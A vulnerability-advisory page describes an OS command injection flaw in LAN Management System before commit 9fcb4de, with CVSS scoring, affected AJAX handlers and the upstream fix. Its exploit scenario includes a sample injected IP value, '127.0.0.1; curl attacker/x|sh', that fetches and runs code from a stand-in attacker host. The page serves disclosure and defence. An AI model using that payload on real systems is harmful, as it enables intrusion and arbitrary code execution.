Severity by source
CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Adjacent management network access plus an authenticated low-privileged LMS operator account are required; once reached, exec() injection yields full host compromise with no user interaction.
Primary rating from Vendor (CERT-PL).
CVSS VectorVendor: CERT-PL
CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
2DescriptionCVE.org
An OS Command Injection vulnerability exists in LMS (LAN Management System) before commit 9fcb4de due to an IP address parameter being passed to the "exec()" function without proper validation, allowing attackers to execute arbitrary operating system commands.
AnalysisAI
OS command injection in LMS (LAN Management System) before commit 9fcb4de allows authenticated adjacent attackers to execute arbitrary operating system commands by supplying a malicious IP address parameter that is passed unsanitized to exec(). The flaw was reported by CERT-PL and an upstream fix is available; no public exploit identified at time of analysis, and the CVSS 4.0 score of 8.6 reflects high impact on the vulnerable system with limited subsequent-system effect.
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires an authenticated LMS operator session (CVSS PR:L) with permission to invoke the netdevxajax getFirstFreeAddress or nodexajax updateNodeLock handlers, and network reachability to the LMS web interface from the same adjacent/management network (CVSS AV:A) - typical internet exposure of LMS is uncommon. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS 4.0 vector AV:A/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:N indicates an adjacent-network attacker with low privileges (an authenticated LMS operator account) can fully compromise the host running LMS without user interaction, which matches the source-code evidence that the vulnerable handlers are AJAX endpoints reachable only from authenticated UI sessions. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker with a low-privileged LMS operator account on the management network opens the network-device or node management UI and submits a crafted IP-address field (for example '127.0.0.1; curl attacker/x|sh') to the getFirstFreeAddress or updateNodeLock AJAX endpoint. Because the $ip parameter is concatenated into a shell command and passed to exec() without validation, the injected commands run as the web server user, yielding arbitrary code execution on the LMS host. … |
| Remediation | Upstream fix available (commit 9fcb4de); released patched version not independently confirmed - apply the upstream patch https://github.com/chilek/lms/commit/9fcb4de19b7d76394898dbc124252b86b07ac0ed or upgrade to any LMS build that includes it, which adds check_ip($ip) validation to getFirstFreeAddress() and updateNodeLock(). … Detailed patch versions, workarounds, and compensating controls in full report. |
Recommended ActionAI
Within 24 hours: Inventory all LMS deployments and identify which versions are affected (prior to commit 9fcb4de). …
Sign in for detailed remediation steps and compensating controls.
Threat intelligence, references, and detailed analysis are available after sign-in.
lms version <= LMS_011123 contains a Local File Disclosure vulnerability in File reading functionality in LMS module tha
Path traversal in Frappe Learning Management System (LMS) versions 2.50.0 and below allows authenticated users with cour
Error-based SQL injection in LMS (LAN Management System) before commit 4cb30a7 allows authenticated attackers to extract
Reflected Cross-Site Scripting in the designthemes LMS WordPress theme (versions 9.7 and earlier) allows unauthenticated
Stored cross-site scripting (XSS) in Frappe Learning Management System versions 2.27.0 through 2.47.x allows unauthentic
Frappe Learning Management System versions prior to 2.46.0 allow authenticated students to modify their own quiz scores
An issue in Mirapolis LMS 4.6.XX allows authenticated users to exploit an Insecure Direct Object Reference (IDOR) vulner
Reflected XSS in LAN Management System (LMS) before commit 9c5651b allows network-positioned attackers to inject arbitra
Metadata injection in Frappe LMS prior to version 2.53.0 enables authenticated users to embed crafted content into user-
Same weakness CWE-78 – OS Command Injection
View allSame technique Command Injection
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-37875
GHSA-765c-7qf8-cw9w